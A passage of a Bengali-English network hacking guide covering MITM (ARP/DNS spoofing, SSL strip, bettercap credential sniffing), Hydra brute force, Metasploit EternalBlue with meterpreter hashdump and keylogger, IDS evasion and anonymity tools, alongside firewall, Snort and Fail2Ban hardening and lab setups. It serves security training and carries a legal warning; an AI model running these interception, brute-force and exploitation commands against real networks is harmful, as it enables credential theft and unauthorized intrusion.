Normal এ: Client → Router → Internet। MITM-এ: Client → Attacker → Router → Internet। Attacker মাঝখানে থেকে সব traffic দেখতে ও পরিবর্তন করতে পারে।Normally: Client → Router → Internet. With MITM: Client → Attacker → Router → Internet. The attacker in the middle can see and modify all traffic.

🥸 ARP Spoofing — MITM-এর ভিত্তিARP Spoofing — Foundation of MITM

# arp-spoof দিয়ে (arpspoof package) # Terminal 1: IP Forwarding enable করো $ echo 1 > /proc/sys/net/ipv4/ip_forward # Terminal 2: Victim-কে বলো "Gateway আমি" $ arpspoof -i eth0 -t 192.168.1.50 192.168.1.1 # ↑interface ↑victim ↑gateway # Terminal 3: Gateway-কে বলো "Victim আমি" $ arpspoof -i eth0 -t 192.168.1.1 192.168.1.50 # Terminal 4: Victim-এর traffic capture করো $ wireshark -i eth0 & # অথবা $ tcpdump -i eth0 host 192.168.1.50 -w victim.pcap

Bettercap — Modern MITM FrameworkBettercap — Modern MITM Framework

# Install $ apt install bettercap $ bettercap -h # Interactive mode $ bettercap -iface eth0 ━━━ Bettercap Commands ━━━ # Network discovery bettercap> net.probe on # Network scan start bettercap> net.show # সব hosts দেখো # ARP Spoofing bettercap> set arp.spoof.targets 192.168.1.50 # Victim IP bettercap> arp.spoof on # Attack start # HTTP/HTTPS sniffer bettercap> http.proxy on # HTTP proxy intercept bettercap> https.proxy on # HTTPS (SSL strip) # Credential sniffer bettercap> net.sniff on # Packet sniffing bettercap> set net.sniff.verbose true # DNS Spoofing bettercap> set dns.spoof.domains facebook.com,google.com bettercap> set dns.spoof.address 192.168.1.10 # Fake server IP bettercap> dns.spoof on # WiFi reconnaissance bettercap> wifi.recon on # WiFi scan bettercap> wifi.show # Networks দেখো bettercap> wifi.deauth AA:BB:CC:DD:EE:FF # Deauth # Caplet (automated script) $ bettercap -iface eth0 -caplet mitm.cap # mitm.cap file: net.probe on set arp.spoof.targets 192.168.1.0/24 arp.spoof on net.sniff on set net.sniff.regexp ".*password.*"

🌐 DNS SpoofingDNS Spoofing

# dnsspoof (classic) # /etc/dnsspoof.hosts file তৈরি করো: # 192.168.1.10 facebook.com # 192.168.1.10 *.facebook.com # 192.168.1.10 google.com $ dnsspoof -i eth0 -f /etc/dnsspoof.hosts # Fake web server setup (victim কে fake page দেখাবে) $ service apache2 start # /var/www/html/index.html এ fake login page রাখো # responder (Windows environments) $ responder -I eth0 -wFb # LLMNR/NBT-NS poisoning → NTLMv2 hash capture করে

🔐 SSL Strip — HTTPS কে HTTP করোSSL Strip — Downgrade HTTPS to HTTP

# sslstrip2 + bettercap bettercap> set https.proxy.sslstrip true bettercap> https.proxy on bettercap> arp.spoof on # Manual sslstrip $ echo 1 > /proc/sys/net/ipv4/ip_forward $ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 $ sslstrip -l 8080 -w sslstrip.log & $ arpspoof -i eth0 -t victim_ip gateway_ip # Log দেখো $ tail -f sslstrip.log | grep -i "password\|login\|user" # Note: Modern browsers-এ HSTS থাকলে SSL Strip কাজ করে না # HSTS Preloaded sites: google.com, facebook.com → safe

✅ Chapter 6 Summary

  • ARP Spoof = MITM-এর core technique
  • Bettercap = সব MITM tool এক জায়গায়
  • DNS Spoof = victim-কে fake site-এ নিয়ে যাও
  • SSL Strip = HTTPS → HTTP downgrade (HSTS-এ কাজ করে না)
Chapter 07
⚔️ Network Service AttacksNetwork Service Attacks
FTP, SSH, Telnet, SMB, RDP — সব service-এর attack ও exploitationFTP, SSH, Telnet, SMB, RDP — attacks and exploitation of all services

🔑 Hydra — Network Login BruteforcerHydra — Network Login Bruteforcer

# SSH brute force $ hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1 $ hydra -L users.txt -P pass.txt ssh://192.168.1.1 -t 4 # FTP brute force $ hydra -l admin -P pass.txt ftp://192.168.1.1 $ hydra -l anonymous -p "" ftp://192.168.1.1 # Anonymous # Telnet $ hydra -l root -P pass.txt telnet://192.168.1.1 # HTTP Form brute force $ hydra -l admin -P pass.txt 192.168.1.1 http-post-form \ "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" # RDP brute force $ hydra -l administrator -P pass.txt rdp://192.168.1.1 # SMB brute force $ hydra -l administrator -P pass.txt smb://192.168.1.1 # MySQL $ hydra -l root -P pass.txt mysql://192.168.1.1 # Options $ hydra -t 16 # 16 parallel tasks $ hydra -V # Verbose (প্রতিটা attempt দেখো) $ hydra -f # First found তে থামো

📂 SMB — Windows File SharingSMB — Windows File Sharing

# SMB enumeration $ smbclient -L //192.168.1.1 -N # Anonymous share list $ smbclient -L //192.168.1.1 -U admin # With credentials $ smbmap -H 192.168.1.1 # Share permissions দেখো $ smbmap -H 192.168.1.1 -u admin -p pass # enum4linux — Windows/Samba enumeration $ enum4linux -a 192.168.1.1 # All info $ enum4linux -U 192.168.1.1 # Users $ enum4linux -S 192.168.1.1 # Shares $ enum4linux -P 192.168.1.1 # Password policy # SMBclient দিয়ে connect $ smbclient //192.168.1.1/Share -U admin%password smb> ls # Files দেখো smb> get secret.txt # File download smb> put exploit.exe # File upload smb> cd / # Directory change # Nmap SMB scripts $ nmap --script=smb-vuln-ms17-010 192.168.1.1 # EternalBlue check $ nmap --script=smb-vuln-ms08-067 192.168.1.1 $ nmap --script=smb-enum-shares 192.168.1.1 $ nmap --script=smb-enum-users 192.168.1.1 # CrackMapExec — Windows network auditing $ crackmapexec smb 192.168.1.0/24 # Discovery $ crackmapexec smb 192.168.1.1 -u admin -p pass $ crackmapexec smb 192.168.1.1 --shares # Shares $ crackmapexec smb 192.168.1.1 -u admin -p pass --sam # SAM dump

🖥️ RDP AttacksRDP Attacks

# RDP scan ও check $ nmap -p 3389 --script=rdp-vuln-ms12-020 192.168.1.1 $ nmap -p 3389 --script=rdp-enum-encryption 192.168.1.1 # RDP brute force $ hydra -l administrator -P rockyou.txt rdp://192.168.1.1 -t 1 $ crowbar -b rdp -s 192.168.1.1/32 -u administrator -C pass.txt # xfreerdp দিয়ে connect $ xfreerdp /u:administrator /p:password /v:192.168.1.1 $ xfreerdp /u:admin /p:pass /v:192.168.1.1 /cert:ignore

💻 Metasploit — Exploitation FrameworkMetasploit — Exploitation Framework

# Metasploit start করো $ msfdb init # Database init $ msfconsole # Start ━━━ Metasploit Basic Commands ━━━ msf> help msf> search eternalblue # Module খোঁজো msf> use exploit/windows/smb/ms17_010_eternalblue msf> show options # Required options দেখো msf> set RHOSTS 192.168.1.50 # Target IP msf> set LHOST 192.168.1.100 # আমাদের IP msf> set LPORT 4444 # Listen port msf> set payload windows/x64/meterpreter/reverse_tcp msf> run # Execute # Meterpreter commands (successful exploit এর পরে) meterpreter> sysinfo # System info meterpreter> getuid # Current user meterpreter> getsystem # Privilege escalation meterpreter> hashdump # Password hashes meterpreter> shell # CMD shell meterpreter> upload file.exe C:\\Windows\\Temp\\ meterpreter> download secret.txt /tmp/ meterpreter> keyscan_start # Keylogger meterpreter> screenshot # Screenshot meterpreter> run post/multi/recon/local_exploit_suggester # Useful modules msf> use auxiliary/scanner/portscan/tcp # Port scanner msf> use auxiliary/scanner/smb/smb_ms17_010 # EternalBlue check msf> use auxiliary/scanner/ssh/ssh_login # SSH brute msf> use auxiliary/scanner/ftp/ftp_login # FTP brute msf> use post/windows/gather/credentials/credential_collector

✅ Chapter 7 Summary

  • Hydra দিয়ে SSH/FTP/HTTP/RDP/SMB brute force করো
  • SMB = Windows-এর সবচেয়ে ঝুঁকিপূর্ণ service
  • Metasploit = exploitation-এর standard tool
  • Meterpreter = post-exploitation-এর সেরা shell
Chapter 08
🔥 Firewall ও IDS EvasionFirewall & IDS Evasion
Firewall bypass techniques, IDS detection evasion, tunnelingFirewall bypass techniques, IDS detection evasion, tunneling

🔥 iptables — Linux Firewalliptables — Linux Firewall

# Rules দেখো $ iptables -L -n -v --line-numbers # Basic rules $ iptables -A INPUT -p tcp --dport 22 -j ACCEPT # SSH allow $ iptables -A INPUT -p tcp --dport 80 -j ACCEPT # HTTP allow $ iptables -A INPUT -j DROP # Else drop $ iptables -A INPUT -s 192.168.1.50 -j DROP # Block IP # Nmap দিয়ে firewall detect করো $ nmap -sA 192.168.1.1 # ACK scan → filtered/unfiltered দেখাবে $ nmap -sW 192.168.1.1 # Window scan $ nmap --traceroute 192.168.1.1 # Firewall bypass techniques $ nmap -f 192.168.1.1 # Fragment packets $ nmap -D RND:10 192.168.1.1 # Decoy scan $ nmap --source-port 53 target # Source port 53 (DNS) $ nmap --source-port 80 target # Source port 80 (HTTP) $ nmap -T1 --scan-delay 5s target # Slow scan

🕳️ Port TunnelingPort Tunneling

# SSH Local Port Forwarding # Firewall blocked 3306 (MySQL) — 22 (SSH) open $ ssh -L 3307:127.0.0.1:3306 user@remote_server # এখন localhost:3307 = remote:3306 $ mysql -h 127.0.0.1 -P 3307 -u root -p # SSH Remote Port Forwarding $ ssh -R 4444:127.0.0.1:4444 user@remote_server # Remote server-এ port 4444 = আমাদের localhost:4444 # SSH Dynamic (SOCKS Proxy) $ ssh -D 1080 user@remote_server # Browser/tool এর SOCKS5 = 127.0.0.1:1080 # Proxychains দিয়ে যেকোনো tool tunnel করো $ nano /etc/proxychains4.conf # [ProxyList] # socks5 127.0.0.1 1080 $ proxychains nmap -sT -p 80,443 target $ proxychains curl http://target.com $ proxychains hydra -l root -P pass.txt ssh://target

🧅 Tor ও AnonymityTor & Anonymity

# Tor install ও start $ apt install tor $ service tor start $ service tor status # Tor SOCKS5 = 127.0.0.1:9050 $ proxychains curl https://check.torproject.org # torify — Tor দিয়ে run করো $ torify curl http://target.com $ torify nmap -sT target # torghost — সব traffic Tor-এ route করো $ torghost -s # Start $ torghost -x # Stop $ torghost -ip # Current IP দেখো # MAC address spoof (physical tracking avoid) $ macchanger -r wlan0 # Random MAC $ macchanger -m 00:11:22:33:44:55 wlan0 # Custom MAC $ ip link set wlan0 down $ macchanger -r wlan0 $ ip link set wlan0 up

✅ Chapter 8 Summary

  • iptables দিয়ে Linux firewall rules manage করো
  • Nmap -sA দিয়ে firewall type detect করো
  • SSH tunneling = firewall block করা port bypass করো
  • Proxychains = যেকোনো tool anonymously চালাও
  • macchanger = physical identity hide করো
Chapter 09
🔒 VPN ও TunnelingVPN & Tunneling
OpenVPN, WireGuard, SSH Tunneling, Proxychains — সম্পূর্ণ গাইডOpenVPN, WireGuard, SSH Tunneling, Proxychains — Complete Guide

🌐 VPN কীভাবে কাজ করে?How Does a VPN Work?

VPN encrypted tunnel তৈরি করে যার মধ্যে দিয়ে traffic যায়। ISP বা network admin traffic দেখতে পায় না। Security testing-এ নিজেকে anonymous রাখতে VPN জানা দরকার।A VPN creates an encrypted tunnel through which traffic passes. ISPs or network admins cannot see the traffic. Knowing VPNs is necessary for staying anonymous during security testing.

WireGuard — Modern VPNWireGuard — Modern VPN

# WireGuard install $ apt install wireguard # Key pair তৈরি করো $ wg genkey | tee privatekey | wg pubkey > publickey $ cat privatekey publickey # Server config: /etc/wireguard/wg0.conf [Interface] Address = 10.0.0.1/24 PrivateKey = <SERVER_PRIVATE_KEY> ListenPort = 51820 PostUp = iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE PostDown = iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE [Peer] PublicKey = <CLIENT_PUBLIC_KEY> AllowedIPs = 10.0.0.2/32 # Client config [Interface] Address = 10.0.0.2/24 PrivateKey = <CLIENT_PRIVATE_KEY> DNS = 8.8.8.8 [Peer] PublicKey = <SERVER_PUBLIC_KEY> Endpoint = server_ip:51820 AllowedIPs = 0.0.0.0/0 # All traffic through VPN # Start/Stop $ wg-quick up wg0 $ wg-quick down wg0 $ wg show # Status

🔗 SSH Tunneling — সব কিছুর জন্যSSH Tunneling — For Everything

━━━ SSH TUNNELING CHEATSHEET ━━━ # 1. Local Port Forward (আমার port → remote service) $ ssh -L local_port:target_host:target_port user@jump_server # Example: Remote MySQL access করো $ ssh -L 3307:192.168.2.5:3306 user@192.168.1.1 $ mysql -h 127.0.0.1 -P 3307 # Now access! # 2. Remote Port Forward (remote port → আমার service) $ ssh -R remote_port:local_host:local_port user@remote # Example: NAT-এর পেছন থেকে reverse shell $ ssh -R 4444:localhost:4444 user@my_vps # 3. Dynamic SOCKS Proxy $ ssh -D 1080 user@proxy_server # SOCKS5 127.0.0.1:1080 → সব traffic route হবে # 4. Jump Host (Bastion) $ ssh -J jump_user@jump_host target_user@final_target # ~/.ssh/config তে: Host final_target ProxyJump jump_user@jump_host User target_user # 5. Multiple hops $ ssh -J user1@hop1,user2@hop2 user3@destination # Background-এ চালাও $ ssh -fNL 3307:127.0.0.1:3306 user@server # -f=background, -N=no command

✅ Chapter 9 Summary

  • WireGuard = fastest, modern VPN — নিজের VPN server বানাও
  • SSH Local Tunnel = blocked port access করো
  • SSH Remote Tunnel = NAT থেকে reverse connection
  • SSH Dynamic = SOCKS proxy → Proxychains দিয়ে ব্যবহার করো
Chapter 10
🛡️ Network Defense ও HardeningNetwork Defense & Hardening
Firewall setup, IDS/IPS, WiFi hardening, Network monitoring — সব defense techniqueFirewall setup, IDS/IPS, WiFi hardening, network monitoring — all defense techniques

🔥 iptables Hardeningiptables Hardening

# Default policy: সব block করো $ iptables -P INPUT DROP $ iptables -P FORWARD DROP $ iptables -P OUTPUT ACCEPT # Outgoing allow # Loopback allow $ iptables -A INPUT -i lo -j ACCEPT # Established connections allow $ iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # Specific services allow $ iptables -A INPUT -p tcp --dport 22 -s 192.168.1.0/24 -j ACCEPT # SSH from LAN only $ iptables -A INPUT -p tcp --dport 80 -j ACCEPT # HTTP $ iptables -A INPUT -p tcp --dport 443 -j ACCEPT # HTTPS # SYN Flood protection $ iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j ACCEPT $ iptables -A INPUT -p tcp --syn -j DROP # Port scan protection $ iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP # NULL scan $ iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP # Xmas scan $ iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP # Ping flood protection $ iptables -A INPUT -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT # Log blocked packets $ iptables -A INPUT -j LOG --log-prefix "DROPPED: " --log-level 4 # Rules save করো $ iptables-save > /etc/iptables/rules.v4 $ iptables-restore < /etc/iptables/rules.v4

🚨 Snort/Suricata — IDS/IPSSnort/Suricata — IDS/IPS

# Snort install $ apt install snort # Basic run $ snort -i eth0 -A console # Console output $ snort -i eth0 -l /var/log/snort # Custom Snort rules (/etc/snort/rules/local.rules) # Rule format: action protocol src_ip src_port → dst_ip dst_port (options) # Port scan detect alert tcp any any -> $HOME_NET any (msg:"Port Scan Detected"; flags:S; threshold: type both, track by_src, count 20, seconds 10; sid:1000001;) # SSH brute force detect alert tcp any any -> $HOME_NET 22 (msg:"SSH Brute Force"; flow:to_server; threshold: type both, track by_src, count 5, seconds 60; sid:1000002;) # Nmap scan detect alert tcp any any -> $HOME_NET any (msg:"Nmap SYN Scan"; flags:S; threshold: type both, track by_src, count 100, seconds 5; sid:1000003;) # Suricata (faster, multi-threaded) $ apt install suricata $ suricata -i eth0 -l /var/log/suricata $ suricata-update # Rules update

📶 WiFi Security HardeningWiFi Security Hardening

════ Router/AP Security Checklist ════ [✓] WPA3 enable করো (অথবা WPA2-AES minimum) [✓] WPS disable করো — router settings → WPS = OFF [✓] Strong password: 20+ characters, random Bad: "MyNetwork123" Good: "j8#Kp2@mX9$vL5!qR3nW" [✓] Router admin password পরিবর্তন করো (admin/admin নয়) [✓] Remote management disable করো [✓] Guest network আলাদা VLAN-এ রাখো [✓] MAC filtering enable করো (extra layer) [✓] SSID broadcast hide করো (obscurity only, not security) [✓] Firmware update রাখো [✓] Transmit power কমাও (range limit করো) [✓] 5GHz band ব্যবহার করো (shorter range) ════ WPA2 Password Testing ════ # নিজের network-এর password strength test করো $ aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake.cap # যদি পাওয়া যায় → পাসওয়ার্ড change করো! ════ Rogue AP Detection ════ $ airodump-ng wlan0mon # Same SSID-এর একাধিক AP দেখলে সন্দেহ $ waidps # Wireless attack detection

📊 Network MonitoringNetwork Monitoring

# Fail2Ban — brute force protection $ apt install fail2ban $ systemctl enable fail2ban # /etc/fail2ban/jail.local [sshd] enabled = true port = ssh maxretry = 3 # 3 failed attempts bantime = 3600 # 1 hour ban findtime = 600 # 10 minute window [http-auth] enabled = true maxretry = 5 bantime = 86400 # 24 hour ban # Status দেখো $ fail2ban-client status $ fail2ban-client status sshd $ fail2ban-client unban 192.168.1.50 # auditd — system call monitoring $ apt install auditd $ auditctl -w /etc/passwd -p rwa # passwd file monitor $ auditctl -w /etc/shadow -p rwa $ ausearch -f /etc/passwd # Log দেখো # Network traffic monitoring $ iftop -i eth0 # Real-time bandwidth $ nethogs eth0 # Per-process bandwidth $ ntopng # Web-based monitor

✅ Chapter 10 Summary

  • Default DROP policy → only allowed traffic pass করো
  • Snort rules দিয়ে port scan, brute force detect করো
  • WPS বন্ধ করো, WPA3 বা WPA2-AES ব্যবহার করো
  • Fail2Ban = brute force-এর বিরুদ্ধে সেরা defense
Chapter 11
🔧 Tools ReferenceTools Reference
Network Security-র সব গুরুত্বপূর্ণ tool এক জায়গায়All important network security tools in one place

📋 Complete Tools ReferenceComplete Tools Reference

ToolCategoryকাজInstall
nmapScanningPort scan, OS/service detect, NSE scriptsPre-installed (Kali)
masscanScanningUltra-fast internet-wide scanapt install masscan
netdiscoverDiscoveryARP-based host discoveryPre-installed
wiresharkAnalysisGUI packet capture ও analysisPre-installed
tcpdumpAnalysisCLI packet capturePre-installed
aircrack-ngWirelessWEP/WPA crack suitePre-installed
hashcatPasswordGPU-based hash crackingPre-installed
hydraBrute ForceOnline network brute forcePre-installed
bettercapMITMARP spoof, MITM frameworkapt install bettercap
metasploitExploitationExploit frameworkPre-installed
hcxdumptoolWirelessPMKID/handshake captureapt install hcxdumptool
reaverWirelessWPS PIN attackPre-installed
enum4linuxSMBWindows/Samba enumerationPre-installed
crackmapexecWindowsWindows network auditingapt install crackmapexec
responderWindowsLLMNR/NBT-NS poisoningPre-installed
snortDefenseIDS/IPSapt install snort
fail2banDefenseBrute force protectionapt install fail2ban
gobusterWeb/DNSDirectory ও DNS brute forcePre-installed
wifiteWirelessAutomated WiFi attack toolPre-installed
proxychainsAnonymityTool-এর traffic proxy করোPre-installed

⌨️ Quick Command CheatsheetQuick Command Cheatsheet

═══ NETWORK RECON ═══ nmap -sV -O -A target # Full aggressive scan nmap -p- -T4 target # All ports fast netdiscover -r 192.168.1.0/24 # ARP discovery dig target.com ANY # DNS all records enum4linux -a target # Windows enum ═══ WIRELESS ═══ airmon-ng start wlan0 # Monitor mode airodump-ng wlan0mon # Network scan airodump-ng -c 6 --bssid BSSID -w out wlan0mon # Capture aireplay-ng -0 5 -a BSSID wlan0mon # Deauth aircrack-ng out-01.cap -w rockyou.txt # Crack hcxpcapngtool -o hash.hc22000 out-01.cap # Convert hashcat -m 22000 hash.hc22000 rockyou.txt # GPU crack ═══ MITM ═══ echo 1 > /proc/sys/net/ipv4/ip_forward # Enable forward arpspoof -i eth0 -t victim gateway # ARP spoof bettercap -iface eth0 # Bettercap tcpdump -i eth0 -A port 80 # HTTP sniff ═══ BRUTE FORCE ═══ hydra -l root -P rockyou.txt ssh://target # SSH hydra -l admin -P pass.txt ftp://target # FTP hydra -l admin -P pass.txt rdp://target # RDP ═══ ANONYMITY ═══ macchanger -r wlan0 # Random MAC proxychains nmap target # Via proxy ssh -D 1080 user@server # SOCKS proxy wg-quick up wg0 # WireGuard VPN ═══ DEFENSE ═══ iptables -P INPUT DROP # Default block fail2ban-client status sshd # Ban status snort -i eth0 -A console # IDS mode suricata -i eth0 # Suricata IDS
Chapter 12
🚀 Real-World Lab ScenariosReal-World Lab Scenarios
Home Lab Setup, Practice Scenarios, CTF Network ChallengesHome Lab Setup, Practice Scenarios, CTF Network Challenges

🏠 Home Lab Setup করোSet Up Your Home Lab

════ VirtualBox Lab Setup ════ Machines তৈরি করো: 1. Kali Linux — Attacker machine (2GB RAM, 2 CPU) 2. Metasploitable2 — Vulnerable Linux target 3. Windows 7/10 — Windows target (DVWA, VulnHub) 4. Ubuntu Server — Web server target Network Settings: All machines → Host-Only Adapter → vboxnet0 অথবা Internal Network → "labnet" Metasploitable2 download: https://sourceforge.net/projects/metasploitable/ Default credentials: Username: msfadmin Password: msfadmin Vulnerable services in Metasploitable2: Port 21 — vsftpd 2.3.4 (backdoor!) Port 22 — OpenSSH 4.7 Port 23 — Telnet Port 25 — Postfix Port 80 — Apache + DVWA + phpMyAdmin Port 139 — Samba (username map script vuln) Port 3306 — MySQL (no password for root!) Port 5432 — PostgreSQL Port 6667 — IRC (Unreal IRCd backdoor) Port 8180 — Apache Tomcat

🎯 Lab Scenario 1: Full Network PentestLab Scenario 1: Full Network Pentest

Target: Metasploitable2 (192.168.56.101) Attacker: Kali Linux (192.168.56.100) STEP 1: Reconnaissance $ nmap -sV -O -A 192.168.56.101 [+] 21/tcp open ftp vsftpd 2.3.4 [+] 22/tcp open ssh OpenSSH 4.7 [+] 80/tcp open http Apache 2.2.8 [+] 3306/tcp open mysql MySQL 5.0.51a STEP 2: Vulnerability Check $ nmap --script=vuln 192.168.56.101 [!] vsftpd 2.3.4 - Backdoor Command Execution STEP 3: Exploit vsftpd backdoor $ msfconsole msf> use exploit/unix/ftp/vsftpd_234_backdoor msf> set RHOSTS 192.168.56.101 msf> run [+] Command shell session 1 opened! id uid=0(root) gid=0(root) groups=0(root) STEP 4: Post Exploitation $ cat /etc/passwd $ cat /etc/shadow $ uname -a $ ss -tlnp

📶 Lab Scenario 2: WiFi Security TestLab Scenario 2: WiFi Security Test

Target: নিজের Home WiFi (authorized!) Hardware: Alfa AWUS036NHA adapter STEP 1: Monitor mode enable $ airmon-ng check kill $ airmon-ng start wlan1 monitor mode enabled on wlan1mon STEP 2: Target scan $ airodump-ng wlan1mon BSSID PWR CH ENC ESSID AA:BB:CC:DD:EE:FF -55 6 WPA2 MyHomeNetwork STEP 3: Capture handshake $ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w test wlan1mon STEP 4: Force handshake (deauth) $ aireplay-ng -0 3 -a AA:BB:CC:DD:EE:FF wlan1mon WPA handshake: AA:BB:CC:DD:EE:FF ← এটা দেখলেই capture হয়েছে STEP 5: Password test $ hcxpcapngtool -o hash.hc22000 test-01.cap $ hashcat -m 22000 hash.hc22000 rockyou.txt Result যদি পাওয়া যায় → password দুর্বল → পরিবর্তন করো!

🌐 Online Practice PlatformsOnline Practice Platforms

PlatformURLধরনমূল্য
TryHackMetryhackme.comGuided labs, Network roomsFree + Premium
HackTheBoxhackthebox.comReal machines, CTFFree + VIP
VulnHubvulnhub.comVM download, offlineFree
PentesterLabpentesterlab.comWeb + NetworkFree + Pro
OffSec Proving Groundsoffensive-security.comNetwork pentestingPaid
PicoCTFpicoctf.orgCTF for beginnersFree

🎓 Certification RoadmapCertification Roadmap

🟢
CompTIA Network+Networking fundamentals, এটা দিয়ে শুরু করো
🔵
CompTIA Security+Security basics, industry standard
🟠
CEH (Certified Ethical Hacker)Network hacking techniques
🔴
eJPT (eLearnSecurity Junior Pentest)Practical, beginner pentest
🟣
OSCP (Offensive Security)Gold standard — সবচেয়ে কঠিন ও সম্মানিত

🎯 তুমি এখন কী কী পারোWhat You Can Now Do

  • 🌐 OSI/TCP-IP বুঝতে ও কোথায় attack হয় জানতে পারো
  • 🔍 Nmap দিয়ে comprehensive network reconnaissance করতে পারো
  • 📶 WEP/WPA/WPA2 wireless security বুঝতে ও test করতে পারো
  • 🎭 ARP Spoof, DNS Spoof, MITM attack করতে পারো (lab-এ)
  • 👃 Wireshark/tcpdump দিয়ে network traffic analyze করতে পারো
  • 🔥 Firewall rules ও IDS configure করতে পারো
  • 🔒 VPN ও SSH tunnel setup করতে পারো
  • 🛡️ Network hardening ও defense implement করতে পারো

📡 "The network is the battlefield — know it better than your enemy."

সব কিছু শুধুমাত্র নিজের network বা authorized lab-এ practice করো। অন্যের system-এ permission ছাড়া কাজ করা আইনত দণ্ডনীয়। Practice everything only on your own network or authorized lab. Accessing others' systems without permission is punishable by law.

Network Hacking & Wireless Security v1.0 — 12 Chapters | সম্পূর্ণ বাংলা গাইড